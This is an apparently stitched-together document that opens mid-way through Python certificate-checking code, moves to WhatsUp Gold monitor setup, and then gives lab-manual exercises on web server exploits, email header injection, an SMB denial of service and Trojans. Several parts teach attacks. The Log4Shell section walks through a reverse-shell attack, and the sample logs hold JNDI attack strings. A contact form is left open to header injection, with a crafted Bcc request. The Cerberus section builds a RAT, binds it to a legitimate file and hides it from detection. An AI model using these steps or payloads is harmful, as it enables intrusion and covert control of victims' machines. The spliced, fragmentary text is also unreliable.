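    hostname, _port = parse_target(url)
    reasons = []
    not_after = datetime.fromtimestamp(ssl.cert_time_to_seconds(cert["notAfter"]), tz=timezone.utc)
    days_left = (not_after - now).total_seconds() / 86400
    if days_left <= 0:
        reasons.append(f"certificate expired on {not_after:%Y-%m-%d}")
    elif expire_within_days is not None and days_left <= expire_within_days:
        reasons.append(f"certificate expires in {days_left:.0f} days (threshold {expire_within_days})")
    if check_usage and not any(name_matches(n, hostname) for n in certificate_names(cert)):
        reasons.append(f"no certificate name matches {hostname}")
    return ("down" if reasons else "up"), reasons


def fetch_peer_cert(url, timeout=10):
    """Network variant: fetch the live certificate for the URL's host and port."""
    hostname, port = parse_target(url)
    context = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    now = utc_date(2025, 1, 15)
    for url, days in [("https://www.example.test", 30), ("https://api.example.test:8081", 60),
                      ("https://example.test", 30)]:
        print(url, evaluate_certificate(SAMPLE_CERT, url, now, expire_within_days=days))
```

Note that `fetch_peer_cert()` uses `ssl.create_default_context()`, which already rejects expired or untrusted chains during the handshake; the explicit expiry threshold is what turns "still valid today" into the early warning the monitor's X-days option provides.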

Adding and editing an SSL Certificate monitor in WhatsUp Gold v16 (2016)
This monitor checks a specific location for the existence of a valid SSL certificate. The monitor
reports as down if the URL cannot be resolved, if the location cannot be accessed, or in cases
where the monitor is configured to use the URL or the IP address of the configured interface,
an SSL certificate is not found at all.

To add a new SSL Certificate active monitor:

1. From the WhatsUp Gold web interface, go to Admin > Monitors. The Monitor Library
dialog appears.

2. Click the Active tab. The Active Monitor list appears.

3. Click New. The Select Active Monitor Type dialog appears.

4. Select SSL Certificate Monitor, then click OK. The Add SSL Certificate Monitor
dialog appears.

5. Enter the appropriate information:

- Name. Enter a unique name for the active monitor. This name displays in the
  Active Monitor Library.

- Description. Enter additional information about the monitor. This description
  displays next to the monitor in the Active Monitor Library.

6. Select the method by which the monitor should locate the SSL certificate:

- Check certificate by URL. Enter the URL where the monitor should look for a
  certificate. The URL must begin with a proper URI scheme, such as http:// or https://.
  Additionally, this field supports appending the URL with a custom port number.
  Port 443 is used by default; however, you can specify an alternate port number as
  well. For example, to use port 8081, use the following
  format: https://www.<domain>.com:8081.

- Check certificate by file. Enter the shared network location of the certificate in
  UNC format. The monitor searches for and uses credentials tied to the target
  device. The device must have valid Windows credentials and you must have
  proper permissions to access the network share as configured.

Note: Both methods support the percent variables %device.hostname and %device.address.

7. Enable the following additional configuration options, if desired:

- Down if certificate expires in the next X days. Specify the number of days for
  the monitor to consider. The monitor reports the target device as down if
  the SSL certificate is set to expire within the number of days entered.

- Check certificate usage (verifies the Common Name matches the URL
  domain). Select this option to configure the monitor to check that the common
  name on the SSL certificate matches the domain on the URL.

8. Enable and configure the following additional proxy settings, if desired:

- Proxy server. Enter the address of the required proxy server if needed to access
  the configured URL. This option is not valid for Path to File.

- Proxy port. Enter the port on which the proxy server listens.

- Proxy username. If required, enter the username for the proxy server.

- Proxy password. Enter the password that coincides with the username for the
  proxy server.

- Timeout (seconds). Enter the length of time WhatsUp Gold attempts to connect.
  When the time you enter is exceeded without connecting, a timeout occurs and
  WhatsUp Gold stops trying to connect. This is considered a failed connection.
  This option is not valid for Path to File.

9. Check Use in Rescan to have the monitor appear in the Active Monitor list on the Device
Properties dialog. WhatsUp Gold adds the monitor type to the device during a rescan,
which is launched using the Rescan button on the Device Properties dialog, if the
protocol or service is active on the device.

Important: The Use in Rescan control only applies if the %device.address or
%device.hostname percent variable is used in either the Check certificate by URL or the
Check certificate by file configuration field.

10. Click OK to save changes.


To edit an existing SSL Certificate active monitor:

1. From the WhatsUp Gold web interface, go to Admin > Monitors. The Monitor Library
dialog appears.

2. Click the Active tab. The Active Monitor list appears.

3. Select the target SSL Certificate monitor.

4. Click Edit. The Edit SSL Certificate Monitor dialog appears.

5. Modify the configuration settings described previously as needed.

6. Click OK to save changes.


Experiment 8
Aim: Demonstration of Web Server Exploits
Theory:

This critical vulnerability, labeled CVE-2021-44228, affects a large number of customers, as the
Apache Log4j component is widely used in both commercial and open source software. In
addition, ransomware attackers are weaponizing the Log4j exploit to increase their reach to more
victims across the globe.

Our demonstration is provided for educational purposes to a more technical audience with the
goal of providing more awareness around how this exploit works. Raxis believes that a better
understanding of the composition of exploits is the best way for users to learn how to combat the
growing threats on the internet.

LOG4J EXPLOIT STORYBOARD

The Apache Log4j vulnerability, CVE-2021-44228, affects a large number of systems, and
attackers are currently exploiting this vulnerability for internet-connected systems across the
world. To demonstrate the anatomy of such an attack, Raxis provides a step-by-step
demonstration of the exploit in action. Within our demonstration, we make assumptions about
the network environment used for the victim server that would allow this attack to take place.
There are certainly many ways to prevent this attack from succeeding, such as using more secure
firewall configurations or other advanced network security devices, however we selected a
common “default” security configuration for purposes of demonstrating this attack.

VICTIM SERVER

First, our victim server is a Tomcat 8 web server that uses a vulnerable version of Apache Log4j
and is configured and installed within a Docker container. The Docker container allows us to
demonstrate a separate environment for the victim server that is isolated from our test
environment. Our Tomcat server is hosting a sample website obtainable
from https://github.com/cyberxml/log4j-poc and is configured to expose port 8080 for the
vulnerable web server. No other inbound ports for this Docker container are exposed other than
8080. The Docker container does permit outbound traffic, similar to the default configuration of
many server networks.

Note, this particular GitHub repository also featured a built-in version of the Log4j attack code
and payload; however, we disabled it for our example in order to provide a view into the screens
as seen by an attacker. We are only using the Tomcat 8 web server portions, as shown in the
screenshot below.

Next, we need to set up the attacker's workstation. Using exploit code
from https://github.com/kozmer/log4j-shell-poc, Raxis configures three terminal sessions, called
Netcat Listener, Python Web Server, and Exploit, as shown below.

NETCAT LISTENER, PORT 9001

The Netcat Listener session, indicated in Figure 2, is a Netcat listener running on port 9001. This
session is to catch the shell that will be passed to us from the victim server via the exploit.

PYTHON WEB SERVER, PORT 80

The Python Web Server session in Figure 3 is a Python web server running on port 80 to
distribute the payload to the victim server.

EXPLOIT CODE, PORT 1389

The Exploit session, shown in Figure 4, is the proof-of-concept Log4j exploit code operating on
port 1389, creating a weaponized LDAP server. This code will redirect the victim server to
download and execute a Java class that is obtained from our Python Web Server running on port
80 above. The Java class is configured to spawn a shell to port 9001, which is our Netcat listener
in Figure 2.

EXECUTE THE ATTACK

Now that the code is staged, it’s time to execute our attack. We’ll connect to the victim
webserver using a Chrome web browser. Our attack string, shown in Figure 5, exploits JNDI to
make an LDAP query to the Attacker’s Exploit session running on port 1389.

The attack string exploits a vulnerability in Log4j and requests that a lookup be performed
against the attacker’s weaponized LDAP server. To do this, an outbound request is made from
the victim server to the attacker’s system on port 1389. The Exploit session in Figure 6 indicates
the receipt of the inbound LDAP connection and redirection made to our Attacker’s Python Web
Server.

The Exploit session has sent a redirect to our Python Web Server, which is serving up a
weaponized Java class that contains code to open up a shell. This Java class was actually
configured from our Exploit session and is only being served on port 80 by the Python Web
Server. The connection log is shown in Figure 7 below.

The last step in our attack is where Raxis obtains the shell with control of the victim’s
server. The Java class sent to our victim contained code that opened a remote shell to our
attacker’s netcat session, as shown in Figure 8. The attacker now has full control of the Tomcat 8
server, although limited to the docker session that we had configured in this test scenario.
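Added defensive example (not Raxis code and not part of the original storyboard): a Python scanner that runs over constructed Tomcat-style access log lines, resolves nested Log4j lookups the way the library would before evaluating them, flags the JNDI lookup the attack string above relies on, and extracts the callback scheme, host and port (the LDAP server on 1389 in the storyboard) so they can be blocked. The log lines, IP addresses and ports are constructed placeholders.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup attempts in web server log lines and pull
out the attacker callback endpoint for blocking and triage. Added defensive example
for the storyboard above; it is not Raxis code. The log lines, addresses and ports
below are constructed placeholders."""
import re
from dataclasses import dataclass
from typing import List, Optional

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation the payload reads jndi:<scheme>://host[:port]/...; the
# storyboard's LDAP server on port 1389 is one instance of this shape.
JNDI_URL = re.compile(
    r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^:/\s}]+)(?::(\d{1,5}))?", re.I
)

@dataclass
class Hit:
    line_no: int
    scheme: str
    host: str
    port: Optional[int]
    raw: str

def normalise(text: str) -> str:
    """Resolve nested lookups from the inside out, roughly as Log4j's lookup engine
    does before the jndi: prefix is ever evaluated, so ${lower:..}, ${upper:..} and
    ${x:-default} wrappers cannot hide the token. Unknown lookups keep their text;
    the loop is bounded so a hostile line cannot spin it."""
    for _ in range(50):
        m = INNER_LOOKUP.search(text)
        if not m:
            break
        body = m.group(1)
        low = body.lower()
        if low.startswith("jndi:"):
            return text                     # the payload is now innermost: done
        if ":-" in body:
            repl = body.rsplit(":-", 1)[1]  # ${anything:-default} -> default
        elif low.startswith("lower:"):
            repl = body[6:].lower()
        elif low.startswith("upper:"):
            repl = body[6:].upper()
        else:
            repl = body                     # e.g. ${date:yyyy}: harmless, just unwrap
        text = text[:m.start()] + repl + text[m.end():]
    return text

def scan_line(line: str, line_no: int = 0) -> Optional[Hit]:
    """Return a Hit when the normalised line carries a JNDI lookup, else None."""
    m = JNDI_URL.search(normalise(line))
    if not m:
        return None
    port = int(m.group(3)) if m.group(3) else None
    return Hit(line_no, m.group(1).lower(), m.group(2), port, line.rstrip())

def scan_log(lines) -> List[Hit]:
    """Scan an iterable of log lines, numbering them from 1 for the analyst."""
    return [h for i, l in enumerate(lines, 1) if (h := scan_line(l, i))]

# Constructed Tomcat-style access log: a benign request, a lookup in the User-Agent,
# a nested-lookup variant in the query string, and a benign non-JNDI lookup.
SAMPLE_ACCESS_LOG = [
    '10.0.0.9 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://10.0.0.5:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:09 +0000] "GET /?q=${${lower:j}ndi:rmi://10.0.0.5/x} '
    'HTTP/1.1" 200 88 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Dec/2021:12:00:11 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "-"',
]
```

Calling `scan_log(SAMPLE_ACCESS_LOG)` flags lines 2 and 3 only; the `${date:yyyy}` line is unwrapped and correctly ignored.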

Experiment 9
Aim: Demonstration of E-mail System Exploits
Theory:

How SMTP works

To understand SMTP header injection, we need to start by looking at SMTP – the Simple Mail
Transfer Protocol.

SMTP is one of the oldest protocols of the Internet, first defined in 1981 in RFC 788. Initially, it
accepted a small set of commands that declared the email sender and recipients. As email
communication became more complex over time, additional headers were added.

The first crucial SMTP concept is the difference between the envelope and the email body. The
envelope is the initial part of the communication and is defined by the SMTP protocol itself. The
following commands make up the envelope:

MAIL FROM: Sets the envelope sender.

RCPT TO: Sets the envelope recipient. This command can be used multiple times if you are
sending a message to multiple addresses.

DATA: Begins the email payload, which consists of email headers and the message body,
separated by a single empty line. The message is terminated by sending a line that contains a
period (.) only.

The email headers are not part of the SMTP protocol. They are interpreted by mail clients (to
display the email correctly) and by dedicated email libraries available in various programming
languages. The two most common headers are:

From: This header sets the visible sender, which can be a different address than set using the
MAIL FROM command. In most email clients, the sender information obtained from the MAIL
FROM command is placed in the Return-Path header, which is hidden by default from the user.

To: This header sets the visible recipient, which can differ from the address set using RCPT TO.
In most email clients, the recipient information from the RCPT TO command is placed in the
Delivered-To header, which is hidden by default from the user.

Here is an example of a simple SMTP dialogue (> = sent, < = received):

> MAIL FROM:<[email protected]>
< 250 OK
> RCPT TO:<[email protected]>
< 250 OK
> RCPT TO:<[email protected]>
< 250 OK
> DATA
< 354 Send message content; end with <CRLF>.<CRLF>
> Content-Type: text/html
> Date: Wed, 25 Dec 2019 00:00:01
> From: Santa Claus <[email protected]>
> Subject: Your Gifts Are Here
> To: Not Naughty <[email protected]>
>
> Hello!
> Your gifts are here, <a href="https://malicioushackersdomain.com/">come to the tree</a>!
> --
> Santa
> .
< 250 OK

The above email from [email protected] would be received by [email protected] and
[email protected]. However, to the users, it would appear that the message was sent by
Santa Claus <[email protected]> (not [email protected]). Instead of their own
address, they would also see that the recipient is Not Naughty <[email protected]>.
Unless Anna and Barbara manually open the email headers in their email client, they would not see
the true sender at all.

How email injection works

Email injection works by inserting newline characters into user input. If the input is not
sanitized, a malicious hacker can add email headers or modify the body of the message. By
ending their malicious payload with a line that contains only a period, attackers can signal the
end of the message, tricking the email server into disregarding any legitimate content that the
back-end script is meant to send.

Most email libraries in web programming languages will not let you add envelope commands
directly. Instead, they take the email headers you supply and often convert them into equivalent
SMTP commands. For example, if you add a BCC header, your email library may take the
header content and create additional RCPT TO commands. If an attacker is able to add email
headers using that specific library, the headers will be converted into equivalent SMTP
commands.

Example of an email injection attack

The following PHP example is a typical contact form (contact.php) vulnerable to email header
injection. It takes the name and email address directly from the input fields and prepares a list of
headers for the email.

<?php
if(isset($_POST['name'])) {
    // User-controlled fields copied straight from the request
    $name = $_POST['name'];
    $replyto = $_POST['replyTo'];
    $message = $_POST['message'];
    $to = 'root@localhost';
    $subject = 'My Subject';

    // Set SMTP headers: $name and $replyto are concatenated unsanitized, so a
    // CR/LF in either lets the submitter append headers of their own
    $headers = "From: $name \n" .
               "Reply-To: $replyto";

    mail($to, $subject, $message, $headers);
}
?>

A non-malicious POST request submitted by a user would be as follows:

POST /contact.php HTTP/1.1
Host: www.example2.com

name=Anna Smith&[email protected]&message=Hello

An attacker could abuse this contact form and inject email data by sending the following POST
request:

POST /contact.php HTTP/1.1
Host: www.example2.com

name=Best Product\r\nbcc: [email protected]&[email protected]&message=Buy my product!

The attacker inserts a newline (\r\n, carriage return and line feed, CRLF) and appends a BCC
header containing additional email addresses. The email library converts these addresses into
RCPT TO commands and delivers the message not only to the intended recipient but also to
these extra addresses. This attack also involves spoofing the Reply-To header through the replyTo
field to make the recipient believe the email came from someone else ([email protected]).

Potential consequences of an email injection attack

Email injection vulnerabilities are considered a severe cybersecurity issue. While they are not
directly harmful to the web application that has the security vulnerability or to its web server,
email injections can allow attackers to send emails with arbitrary content to arbitrary recipients
in a wide variety of attacks.

The most common email injection attack vectors include:

Spam: A malicious user could use email injection to send spam messages. One line of code with
a successful email injection could allow them to force the victim’s email server to send multiple
emails with the same content to many recipients.

Phishing: An attacker could send phishing email messages that appear to originate from the
victim’s mail server, domain, and IP. As such, the attacker would be untraceable, and the blame
would lie with the victim. If the victim’s application also has a cross-site scripting (XSS)
vulnerability and the links in the phishing email point to this vulnerable application, the email
appears even more legitimate.

Spear phishing: Going a step further, attackers could send legitimate-looking spear-phishing
email messages to selected employees at the company that runs the vulnerable application. For
example, they could send the financial department a convincing email that appears to come from
the CFO and urgently asks for a large bank transfer to the attacker’s account.

How to detect email injection vulnerabilities?

The best way to detect email injection vulnerabilities depends on whether they are already
known or unknown.

If you only use commercial or open-source software and do not develop software of your own, it
may be enough to identify the exact version of the system or application you are using. If the
identified version is susceptible to email injection, you can assume that your software is
vulnerable. You can identify the version manually or use a suitable security tool, such as a
software composition analysis (SCA) solution for web applications or a network scanner for
networked systems and applications.

If you develop your own software or want the ability to potentially find previously unknown
email injection vulnerabilities (zero-days) in known applications, you must be able to
successfully exploit the email injection vulnerability to be certain that it exists. This requires
either performing manual penetration testing with the help of security researchers or using a
vulnerability scanner tool that can automatically exploit web vulnerabilities. Examples of such
tools are Invicti and Acunetix by Invicti. We recommend using this method even for known
vulnerabilities.

Note that email injection is an out-of-band vulnerability, meaning that the attacker does not
receive a direct response to their actions. To detect out-of-band vulnerabilities automatically, the
vulnerability scanner needs an intermediary service. Invicti products use dedicated intermediary
services to detect out-of-band vulnerabilities, including email header injections.

How to prevent email injection vulnerabilities?

To prevent email injection, developers should follow the application security best practice of
treating all user input as untrusted and sanitizing it using input filtration and/or output encoding.
This advice applies not just to email injection but also to most other web security vulnerabilities,
including cross-site scripting, HTML injection, and SQL injection. The recommended practices
for email injection are:

Ensure that your code never directly uses content supplied by the user when specifying command
parameters for functions used to send email, such as mail() in PHP.

Automatically sanitize user input and remove all newline characters before passing content to
mail functions. For input validation, use a whitelist of allowed characters and remove any that
are not on the list.

Encode all data passed to mail functions. This will scramble any CR and LF codes that attackers
attempt to inject.

How to mitigate email injection attacks?

You can mitigate email injection attacks on several levels, even if email header injection
vulnerabilities exist in your web applications:

Mitigation at the development environment level: Allow your programmers to use only safe
development environments, libraries, and functions. Some email libraries are naturally resistant
to email injection. For example, smtplib in Python is safe because SMTP.sendmail() requires
you to specify an explicit list of recipients. If an attacker adds headers, it will only change the
way the email appears.

Mitigation at the web server level: Completely block unsafe email functions and create a safe
email API that your developers are required to use. For example, you can disable the unsafe PHP
mail() function using the disable_functions directive in php.ini. Another option is to completely
block server-side email functionality and require your developers to send emails through
specialized services, like AWS Amazon Simple Email Service (SES).

Mitigation at the SMTP server level: Use a separate SMTP server for custom web applications.
On that server, you can limit your email throughput and block emails that have, for example,
more than 10 recipients. Set up alerts to warn the administrator about blocked attempts and any
other unusual conditions. Remove these limits only for trusted applications. While this will not
protect you against spear phishing through email injection, it will eliminate the risk of email
injections leading to mass mailing attacks, such as spam or phishing.
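As an added example (not from the lab manual or from Invicti), the following Python code ties together the prevention list and the smtplib mitigation above: it rejects CR/LF and off-whitelist characters in the contact-form fields before they reach any header, shows which headers the contact.php-style concatenation would let an unsanitized field add, and builds the message with an explicit envelope recipient list of the kind smtplib.SMTP.sendmail() takes, so an injected Bcc can never turn into extra RCPT TO commands. All form values, addresses and domains are constructed placeholders.

```python
"""Defensive demo of email header injection (added example; not the manual's or
Invicti's code). It shows the CR/LF validation the prevention list calls for, which
headers an unsanitised field would add, and a safe build whose envelope recipients
are an explicit list, as smtplib.SMTP.sendmail() requires. All form values,
addresses and domains below are constructed placeholders."""
import re
from email.message import EmailMessage
from email.parser import Parser

# Constructed submissions, modelled on the contact.php form above.
BENIGN = {"name": "Anna Smith", "replyTo": "anna@example.invalid", "message": "Hello"}
HOSTILE = {
    "name": "Best Product\r\nBcc: victim1@example.invalid, victim2@example.invalid",
    "replyTo": "spoofed@example.invalid",
    "message": "Buy my product!",
}

# Whitelists for a display name and a single address: no CR, LF, ':' or '<' allowed.
NAME_OK = re.compile(r"[A-Za-z0-9 .,'_-]{1,64}")
ADDR_OK = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def contains_crlf(value: str) -> bool:
    """True if a field carries CR or LF, the precondition for header injection."""
    return "\r" in value or "\n" in value

def validate_form(form: dict) -> list:
    """Return validation problems; an empty list means the input may reach mail code."""
    problems = []
    for field in ("name", "replyTo"):
        if contains_crlf(form[field]):
            problems.append(f"{field}: CR/LF not allowed")
    if not NAME_OK.fullmatch(form["name"]):
        problems.append("name: characters outside whitelist")
    if not ADDR_OK.fullmatch(form["replyTo"]):
        problems.append("replyTo: not a single well-formed address")
    return problems

def naive_headers(form: dict) -> str:
    """Header block built the way contact.php does it: raw input concatenated."""
    return f"From: {form['name']}\r\nReply-To: {form['replyTo']}\r\n"

def injected_header_names(form: dict) -> list:
    """Parse the naive block as a mail library would; any header other than the two
    we meant to set got there through the user's input."""
    msg = Parser().parsestr(naive_headers(form) + "\r\n" + form["message"])
    return [k for k in msg.keys() if k.lower() not in ("from", "reply-to")]

def build_safe_message(form: dict, to_addr: str):
    """Validate first, then build with EmailMessage (which itself refuses header
    values containing CR/LF). Returns the message plus the envelope recipient list
    that our code, not the headers, decides on; that list is what you hand to
    smtplib.SMTP.sendmail(), so an injected Bcc can never become an extra RCPT TO."""
    problems = validate_form(form)
    if problems:
        raise ValueError("; ".join(problems))
    msg = EmailMessage()
    msg["From"] = f"{form['name']} <noreply@example.invalid>"  # fixed, trusted sender
    msg["Reply-To"] = form["replyTo"]
    msg["To"] = to_addr
    msg["Subject"] = "My Subject"
    msg.set_content(form["message"])
    return msg, [to_addr]
```

With the hostile submission, injected_header_names() reports the smuggled Bcc header, while build_safe_message() refuses the input outright.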

Experiment No 10

Aim: Study of detection and prevention of security attack on Mobile OS

Theory:

Shivi Garg, Niyati Baliyan, Comparative analysis of Android and iOS from security viewpoint,
Computer Science Review, Volume 40, 2021, 100372, ISSN 1574-0137,
https://doi.org/10.1016/j.cosrev.2021.100372.
(https://www.sciencedirect.com/science/article/pii/S1574013721000125)

Use any reference paper to analyse security measures in Mobile OS.


Experiment No 11

Aim: Denial of Service Exploits-Windows Denial of Service SMBDie

Theory:

A denial of service vulnerability exists when Windows Search improperly handles objects in memory.
An attacker who successfully exploited the vulnerability could cause a remote denial of service
against a system.

To exploit the vulnerability, the attacker could send specially crafted messages to the Windows
Search service. Additionally, in an enterprise scenario, a remote unauthenticated attacker could
remotely trigger the vulnerability through a Server Message Block (SMB) connection.

The security update addresses the vulnerability by correcting how Windows Search handles objects
in memory.

Exploitation

CVE-2022-32230 is caused by a missing check in srv2!Smb2ValidateVolumeObjectsMatch to
verify that a pointer is not null before reading a PDEVICE_OBJECT from it and passing it to
IoGetBaseFileSystemDeviceObject. The following patch diff shows the function in question for
Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).

This function is called from the dispatch routine for an SMB2 QUERY_INFO request of the
FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION class. Per the docs in MS-
SMB2 section 3.3.5.20.1 Handling SMB2_0_INFO_FILE,
FILE_NORMALIZED_NAME_INFORMATION is only available when the dialect is 3.1.1.

For FileNormalizedNameInformation information class requests, if not supported by the server
implementation<392>, or if Connection.Dialect is "2.0.2", "2.1" or "3.0.2", the server MUST fail
the request with STATUS_NOT_SUPPORTED.

To trigger this code path, a user would open any named pipe from the IPC$ share and make a
QUERY_INFO request for the FILE_NORMALIZED_NAME_INFORMATION class. This
typically requires user permissions or a non-default configuration enabling guest access. This is
not the case, however, for the noteworthy exception of domain controllers where there are
multiple named pipes that can be opened anonymously, such as netlogon. An alternative named
pipe that can be used but does typically require permissions is the srvsvc pipe.

Under normal circumstances, the FILE_NORMALIZED_NAME_INFORMATION class would
be used to query the normalized name information of a file that exists on disk. This differs from
the exploitation scenario which queries a named pipe.

A system that has applied the patch for this vulnerability will respond to the request with the
error STATUS_NOT_SUPPORTED.

Experiment No 12

Aim: Experimenting with Trojans (installing, deploying, controlling).

Theory:

A RAT is used to remotely connect to and manage one or more computers. A RAT is one of
the most dangerous kinds of Trojan because it combines the features of all other types of
Trojan. It provides an attacker with nearly unlimited access to the host computer, including
screen capture, file management, shell control and device driver control. RATs use reverse
connections to reach the remote system and hence are more likely to remain undetected.
They can hide themselves in the process space of a legitimate program and hence never appear
in Task Manager or system monitors.

A Trojan generally has two parts, Client and Server, also called Master and Slave: the Server is
the Slave and the Client is the Master. The server side is installed on the remote host and the
attacker manipulates it with the client software. In olden days making a Trojan was a job for a
master programmer, but nowadays several Trojan-building tools are available. Most of them
have the same kind of interface, so it is quite easy to use any Trojan client once you have
used one of them. The following is a list of some well-known Trojans and Trojan-building
tools:

1.Casa RAT
2.Back Orifice
3.Bandook RAT
4.Dark Comet Rat
5.Cerberus
6.Cybergate
7.Blackshades
8.Poison Ivy
9.Schwarze Sonne RAT
10.Syndrome RAT
11.Team Viewer
12.Y3k RAT
13.Snoopy
15.5p00f3r.N$ RAT
16.NetBus
17.SpyNet
18.P. Storrie RAT
19.Turkojan Gold
20.Bifrost
21.Lost Door
22.Beast
23.Shark
24.Sub7
25.Pain RAT
26.xHacker Pro RAT
27.Seed RAT
28.Optix Pro RAT
29.Dark Moon
30.NetDevil
31.Deeper RAT
32.MiniMo RAT

If you think the list is very big, then I must tell you it is not complete, nor does it cover 25% of
RAT-building tools.

Demonstration: How to create a RAT: Since there are several tools available and most of
them have the same kind of interface, we can select any RAT-building tool for demonstration.
Here we select the Cerberus client to demonstrate the working of a RAT.

Type “Download Cerberus RAT” in Google search and download Cerberus RAT. Execute the
Cerberus file and launch the program. Accept the EULA and the following interface will be
launched in front of you.

To create a server, press the New button.

As you can see, several options are available in the settings, but for our demonstration we
will use the most common settings. In “Basic Option”, type your IP address and then press
“+”. “Identification” is the name of the server by which your client will identify which server
it is listening to; this name is given so that your client can identify the connection. There is no
need to specify anything in the connection password. Specify the port on which you would like
to listen. Please keep note of this port, since you will have to configure the client settings to
receive information on this port.

The next option is “Server Installation”. From “Directory Installation” you can select where,
and in which folder, your RAT server will be installed. In the “File Name” option you have
to specify the name and extension of your server. “Boot Methods” gives you the option to start
your server as a “System Service” or a “User Application”; take your pick or leave them
untouched. The “Anti-Debugging” function allows your RAT to bypass virtualisation and
sandboxing.

From “Misc Options” you can activate the key-logging feature, and you can also select how
your RAT hides itself in another process.

The “Display Message” option gives you the power to show a custom message on the victim's
computer. The “Black List Item” option allows you to set logic for the execution of your RAT
server with respect to specific processes and services. Mostly only advanced users use this
feature.

“Overview” lets you look over the features of your RAT. Now select an icon and press Create
Server to create the server.

Now the Add File function allows you to bind your RAT with any legitimate file, most
probably an executable installation file. To avoid detection, don't use a custom message box
and un-check the “Run in Visible Mode” option while creating the server.

Configuring to Listen on Client: To configure Cerberus to listen on a specific port, select
Options and enter the “Connection Password” and “Connection Ports” that were specified in
the server. Wait for the victim to execute the server, then right-click on the listening server
and play with the options.
